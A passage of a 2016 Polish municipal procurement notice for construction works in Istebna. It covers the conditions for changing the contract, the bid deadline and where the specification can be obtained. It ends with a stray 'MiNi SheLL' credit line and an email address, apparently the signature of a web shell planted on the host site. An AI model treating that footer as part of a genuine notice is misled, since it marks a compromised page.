- wyjątkowo niesprzyjających warunków fizycznych, bądź atmosferycznych,
- nadzwyczajnych zdarzeń gospodarczych niezależnych od Zamawiającego, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy,
- decyzji Nadzoru budowlanego mających wpływ na przesunięcie terminu realizacji robót takich jak wstrzymanie budowy,
- wystąpienia zamówień dodatkowych w rozumieniu ustawy Prawo zamówień publicznych, niezbędnych do prawidłowego wykonania realizowanego zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia,
- wprowadzenie zmian w dokumentacji projektowej w szczególności tych, które wynikają z błędów projektowych lub niedostosowania projektu do faktycznych warunków terenowych, a także zmian powodujących poprawę efektywności ekonomicznej inwestycji. 
- zmian będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie robót przez Zamawiającego,
- zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem umowy i nieprzewidywalnych, których brak wykonania uniemożliwia lub utrudnia prawidłowe wykonanie przedmiotu umowy, 
- odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienia niezinwentaryzowanych obiektów budowlanych, sieci lub instalacji,
- wydłużenia terminu realizacji przedmiotu umowy - na wniosek Wykonawcy,
b. rezygnacja z wykonania części robót - ograniczenie zakresu robót wynikające z wprowadzenia zmian istotnych lub nieistotnych w dokumentacji projektowej, wad w dokumentacji projektowej, które wynikły w trakcie realizacji robót i były konieczne w celu prawidłowej realizacji przedmiotu umowy lub z przyczyn niezależnych od Zamawiającego wraz z obniżeniem wynagrodzenia umownego o zakres z którego Zamawiający rezygnuje,
c. zmiana przedstawicieli uczestników procesu inwestycyjnego w przypadku:
- zmiany kierownika budowy w przypadku wystąpienia o zmianę na wniosek Zamawiającego lub Wykonawcy, pod warunkiem przedstawienia w ich zastępstwie osoby/osób posiadającej/posiadających odpowiednie uprawnienia budowlane oraz doświadczenie zawodowe, zgodnie z warunkami określonymi w Specyfikacji Istotnych Warunków Zamówienia, sporządzonej na potrzeby postępowania, 
- zmiany przedstawicieli Zamawiającego na wniosek Zamawiającego,
d. wprowadzenie lub zmiana podwykonawcy dot. zakresu robót przeznaczonych do wykonania przez podwykonawcę w tym również zmiany podwykonawcy, będącego jednocześnie podmiotem trzecim, na którego zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wskazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, pomimo, że w ofercie sporządzonej na potrzeby postępowania o udzielenie zamówienia, Wykonawca nie przedstawił zakresu robót, który powierzy podwykonawcom, w przypadku wystąpienia zmian w tym zakresie - na wniosek Zamawiającego lub Wykonawcy,
e. zawieszenie przez Zamawiającego wykonania części lub całości robót na czas trwania przeszkody w przypadku:
- wystąpienia konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem umowy i nie przewidywanych, których brak wykonania uniemożliwia lub utrudnia prawidłowe wykonanie przedmiotu umowy,
- braku lub wad w dokumentacji projektowej lub innych dokumentach budowy.
f. zmiana technologii wykonania robót, lub zmiana materiałów, jeżeli nowe rozwiązania będą korzystne dla Zamawiającego, przy zachowaniu niepogorszonych standardów jakościowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://istebna.bip.info.pl/index.php?idmp=165&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Istebna 
43-470 Istebna 1000 
tel 33 8556500.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2016 godzina 10:00, miejsce: Urząd Gminy Istebna 
43-470 Istebna 1000 pok. 102 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com